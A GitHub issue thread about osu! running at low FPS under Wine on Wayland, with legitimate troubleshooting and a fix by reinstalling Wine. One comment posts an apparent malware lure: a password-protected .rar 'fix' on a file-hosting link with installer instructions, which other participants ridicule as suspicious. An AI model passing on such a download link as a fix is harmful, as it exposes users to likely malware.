### ISSUE TITLE
Game running at ~45 FPS

### ISSUE THREAD

**Issue by mwPandoraid** [NelloKudo/osu-winello#87]
I'm encountering an issue with low performance and resolutions. After starting the game, it defaults to 1920x1080 instead of the 2560x1440 that my monitor offers. At 1920x1080 it runs at around 60fps, but when i up the resolution it drops down to 45.
I'm running Arch Linux on the Linux 6.10.6-arch1-1 kernel, Ryzen 5 5600X and an RTX 2080 SUPER and I'm using Hyprland (so Wayland).
I don't think drivers are an issue, since I followed the guide and I get around 80FPS in Cyberpunk 2077.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mwPandoraid** [comment]
yep im downloading that suspicious rar file thank you very much

**Comment by NelloKudo** [comment]
wolone can certainly use his rar files on his family’s pcs for me 🥳

sorry for that, but have you tested any different DE? how’s the game running on them?
using bordeless fullscreen on WMs should provide a better experience overall, so make sure to try that.

**Comment by mwPandoraid** [comment]
I tried on dwm beforehand and also had the same issues, my switch to Wayland was actually partially caused by the fact that I hoped osu would run better.
Borderless doesn't help, in fact I dont even have the option to use normal fullscreen at my max resolution.
Could this be caused by the fact that I have 3 monitors and Wine is getting confused?

**Comment by mwPandoraid** [comment]
Unplugging every monitor but my primary doesn't help, even after a reboot i'm stuck with ~45 fps.
How would I go about setting the `DISPLAY= osu-wine` thing? I added `export DISPLAY=osu-wine` to `~/.local/bin/osu-wine`, but that causes osu to fail to start.

> The Wayland driver is entirely usable outside of the editor, but if you have multiple monitors you might want to also set (zero-indexed) `WINE_WAYLAND_DISPLAY_INDEX=#`, # being which monitor in the list that e.g. `xrandr` outputs. Otherwise, Wine just gets the resolution/hz from the leftmost monitor and can display incorrectly.

This actually helped with resolution detection, thanks! Sadly the FPS issue still remains unsolved

**Comment by NelloKudo** [comment]
> Unplugging every monitor but my primary doesn't help, even after a reboot i'm stuck with ~45 fps. How would I go about setting the `DISPLAY= osu-wine` thing? I added `export DISPLAY=osu-wine` to `~/.local/bin/osu-wine`, but that causes osu to fail to start.
> 
> > The Wayland driver is entirely usable outside of the editor, but if you have multiple monitors you might want to also set (zero-indexed) `WINE_WAYLAND_DISPLAY_INDEX=#`, # being which monitor in the list that e.g. `xrandr` outputs. Otherwise, Wine just gets the resolution/hz from the leftmost monitor and can display incorrectly.
> 
> This actually helped with resolution detection, thanks! Sadly the FPS issue still remains unsolved

DISPLAY= is supposed to be an empty env. variable, so `export DISPLAY=` should be enough to make it launch properly

**Comment by mwPandoraid** [comment]
Still fails to start.
These log entries look like they might be related:
```
0108:err:winediag:nodrv_CreateWindow Application tried to create a window, but no driver could be loaded.
0108:err:winediag:nodrv_CreateWindow L"The explorer process failed to start."
0108:err:systray:initialize_systray Could not create tray window
```
and
```
0188:err:winediag:nodrv_CreateWindow Application tried to create a window, but no driver could be loaded.
0188:err:winediag:nodrv_CreateWindow L"Make sure that your X server is running and that $DISPLAY is set correctly."
```

**Comment by mwPandoraid** [comment]
Turns out i had something messed up with my wine install - i removed every single package related to wine i could find, and then uninstalled osu using the script and then installed it again. Now i'm getting 240fps, assuming it's some kind of FPS lock since my primary display is 240Hz, but that's fine.
Thanks for the help everyone!
